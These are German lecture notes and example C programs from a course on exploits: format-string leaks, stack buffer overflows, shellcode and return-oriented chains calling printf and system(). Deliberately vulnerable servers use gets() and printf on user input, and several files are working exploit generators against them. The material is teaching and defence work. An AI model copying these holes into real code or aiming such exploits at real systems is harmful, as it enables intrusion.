Notizen und Beispielprogramme: Format-String-Angriffe, Pufferüberläufe

20170714/bs-20170714.txt

+Exploits, 14.07.2017
+~~~~~~~~~~~~~~~~~~~~
+Vorab:
+
+  Dies ist keine Einladung, anderer Leute Systeme anzugreifen.
+  Derartige Handlungen sind Straftaten.
+
+  Ich erzähle Ihnen dies, damit Sie wissen,
+  wie Sie sich gegen derartige Angriffe verteidigen können.
+
+  Um es gleich vorwegzunehmen:
+  Gewöhnen Sie sich von vorneherein an,
+  sauber und ordentlich zu programmieren.
+
+Anleitungen für Exploits:
+http://www.computersecuritystudent.com/SECURITY_TOOLS/BUFFER_OVERFLOW/WINDOWS_APPS/lesson1/index.html
+http://www.thesprawl.org/research/exploit-exercises-protostar-stack/
+
+Literatur:
+Jon Erickson: Hacking: The Art of Exploitation.
+No Starch Press, 2003. ISBN: 1-59327-007-0
+
+Anleitung für den GNU-Debugger (gdb):
+http://beej.us/guide/bggdb/
+
+Formatstring-Angriff:
+
+  printf (user_string) für Exploit nutzen: %016llx
+  Server, der Passwort auf dem Stack speichert --> server-0.c
+
+  $ ./server-0
+  Your name, please: %016llx %016llx %016llx %016llx %016llx %016llx %016llx %016llx
+  Hello, 00000000004007c7 00007fdb2ced2df0 00000000004007c7 00007fdb2d0f3007
+         20786c6c36313025 6373316870216948 00007fdb2cbd0068 0000007265746570!
+                          ~~~~~~~~~~~~~~~~             ~~~~
+  Your password, please:
+
+SQL Injection: http://xkcd.com/327/
+
+Noch blöder: Java-Browser-Applet enthält Passwörter im Klartext:
+http://heise.de/-2812713
+
+Buffer Overflow für Exploit nutzen: server-[123].c, exploit-*
+
+Warum Absturz? Rücksprungadresse wird überschrieben. Blick auf den Stack.
+Funktionsaufruf: Register setzen, Funktion anspringen.
+Exploit: Rücksprungadresse gezielt überschreiben.
+Früher möglich: Programm in den Stack schreiben, dorthin springen.
+Heute: Nicht-ausführbarer Stack, Address Space Layout Randomization (ASLR)
+Return Oriented Programming erforderlich
+genauer: return-to-libc; noch genauer: return-to-plt
+Gezielt Winz-Funktionen anspringen, um Register zu setzen,
+danach Programm- und Bibliotheksfunktionen anspringen.
+
+Exploits: aktuelle Sicherheitslücke, 28.12.2016, 13:46:05
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Lücke in PHPMailer erlaubt die Ausführung fremden Codes
+https://heise.de/-3582072

20170714/exploit-1.c

+#include <unistd.h>
+
+int main (int argc, char **argv)
+{
+  for (int i = 2; i < 50; i++)
+    write (1, "\x90", 1);                // nop
+  write (1, "\x48\x83\xec\x60", 4);      // sub    $0x60,%rsp
+  write (1, "\x48\x89\xe7", 3);          // mov    %rsp,%rdi
+  write (1, "\xb8\x00\x00\x00\x00", 5);  // mov    $0x0,%eax
+  write (1, "\xe8\x26\xfe\xff\xff", 5);  // callq  0x4003e0 <printf@plt>
+  write (1, "\xeb\xfe", 2);              // while (1);
+  write (1, "\n", 1);
+  return 0;
+}

20170714/exploit-1a.c

+#include <unistd.h>
+#include <stdint.h>
+
+int main (int argc, char **argv)
+{
+  uint64_t return_address = 0x7fffffffdfc0;
+  for (int i = 2; i < 42; i++)
+    write (1, "\x90", 1);                // nop
+  write (1, &return_address, 8);
+  write (1, "\x48\x83\xec\x60", 4);      // sub    $0x60,%rsp
+  write (1, "\x48\x89\xe7", 3);          // mov    %rsp,%rdi
+  write (1, "\xb8\x00\x00\x00\x00", 5);  // mov    $0x0,%eax
+  write (1, "\xe8\x26\xfe\xff\xff", 5);  // callq  0x4003e0 <printf@plt>
+  write (1, "\xeb\xfe", 2);              // while (1);
+  write (1, "\n", 1);
+  return 0;
+}

20170714/exploit-2.c

+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+
+#define OVERFLOW 40
+
+int main (int argc, char **argv)
+{
+  uint64_t mov_rsp_rdi = 0x555555554791;
+  uint64_t add_offset_to_edi = 0x555555554798;
+  uint64_t dummy = 0;
+  uint64_t printf_address = 0x7ffff7a8a160;
+  uint64_t exit_address = 0x7ffff7a70950;
+  uint8_t overflow[OVERFLOW] = "loser";
+  uint8_t payload[] = "I 0WN U!!1!                             "
+                      "                                             ";
+  write (1, overflow, sizeof (overflow));
+  write (1, &mov_rsp_rdi, 8);
+  write (1, &add_offset_to_edi, 8);
+  write (1, &printf_address, 8);
+  write (1, &exit_address, 8);
+  write (1, &dummy, 8);
+  write (1, payload, sizeof (payload));
+  write (1, "\n", 1);
+  return 0;
+}

20170714/exploit-3.c

+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+
+#define OVERFLOW 40
+
+int main (int argc, char **argv)
+{
+  uint64_t mov_rsp_rdi = 0x555555554791;
+  uint64_t add_offset_to_edi = 0x555555554798;
+  uint64_t dummy = 0;
+  uint64_t system_address = 0x7ffff7a7a450;
+  uint64_t exit_address = 0x7ffff7a70950;
+  uint8_t overflow[OVERFLOW] = "loser";
+  uint8_t payload[] = "gimp ../common/os-layers.xcf.gz";
+  write (1, overflow, sizeof (overflow));
+  write (1, &mov_rsp_rdi, 8);
+  write (1, &add_offset_to_edi, 8);
+  write (1, &system_address, 8);
+  write (1, &exit_address, 8);
+  write (1, &dummy, 8);
+  write (1, payload, sizeof (payload));
+  write (1, "\n", 1);
+  return 0;
+}

20170714/peter.txt

+peter

20170714/server-0.c

+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+
+int main (void)
+{
+  char name_buffer[100];
+  char *pass_buffer;
+  char username[] = "peter";
+  char password[] = "Hi!ph1sch";
+
+  printf ("Your name, please: ");
+  gets (name_buffer);
+  printf ("Hello, ");
+  printf (name_buffer);
+  printf ("!\n");
+
+  pass_buffer = getpass ("Your password, please: ");
+  if (strcmp (name_buffer, username) == 0 && strcmp (pass_buffer, password) == 0)
+    printf ("You have access.\n");
+  else
+    printf ("Login incorrect.\n");
+  return 0;
+}

20170714/server-1.c

+#include <stdio.h>
+
+int main (void)
+{
+  char buffer[20];
+  printf ("Your name, please: ");
+  gets (buffer);
+  printf ("Hello, %s!\n", buffer);
+  return 0;
+}

20170714/server-2.c

+#include <stdio.h>
+#include <stdlib.h>
+
+void stuff (void)
+{
+  asm ("mov $0, %eax");
+  asm ("add $0x28, %rsp");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  asm ("mov %rsp, %rdi");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  asm ("add $0x20, %rdi");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  system ("clear");
+  exit (0);
+}
+
+int main (void)
+{
+  char buffer[20];
+  printf ("Your name, please: ");
+  gets (buffer);
+  printf ("Hello, %s!\n", buffer);
+  return 0;
+}

20170714/server-3.c

+#include <stdio.h>
+#include <stdlib.h>
+
+void stuff (void)
+{
+  asm ("mov $0, %eax");
+  asm ("add $0x28, %rsp");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  asm ("mov %rsp, %rdi");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  asm ("add $0x20, %rdi");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  system ("clear");
+  exit (0);
+}
+
+int main (void)
+{
+  char buffer[20];
+  printf ("Your name, please: ");
+  fgets (buffer, 20, stdin);
+  printf ("Hello, %s!\n", buffer);
+  return 0;
+}

20170714/test-asm.c

+int main (void)
+{
+  char msg[] = "I 0WN U!!1!                             "
+               "                                             ";
+  asm ("sub $96, %rsp");
+  asm ("mov %rsp, %rdi");
+  asm ("mov $0, %eax");
+  asm ("call printf");
+  asm ("add $96, %rsp");
+  return 0;
+}

20170714/test-c.c

+#include <stdio.h>
+
+int main (void)
+{
+  char msg[] = "I 0WN U!!1!                             "
+               "                                             ";
+  printf (msg);
+  return 0;
+}